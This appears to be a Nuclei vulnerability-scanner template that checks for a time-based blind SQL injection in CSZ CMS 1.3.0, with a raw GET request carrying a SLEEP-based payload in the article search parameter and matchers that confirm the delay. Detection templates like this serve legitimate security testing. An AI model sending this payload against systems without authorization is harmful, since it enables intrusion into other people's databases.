id: csz-cms-sqli

info:
  name: CSZ CMS 1.3.0 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities.
  reference:
    - https://packetstormsecurity.com/files/167028/CSZ-CMS-1.3.0-SQL-Injection.html
  metadata:
    verified: true
    max-request: 1
  tags: packetstorm,sqli,csz,cms

http:
  - raw:
      - |
        @timeout: 20s
        GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "CSZ CMS")'
        condition: and

# digest: 4a0a00473045022006993fcb25c049e956bf7b0ad9c725cc8d9558aabe9394aa669e94bee59d9489022100a1bd51fe83f16743a47530a19015ccad81dea74b907195083cf5563a808ebef6:922c64590222798bb761d5b6d8e72950
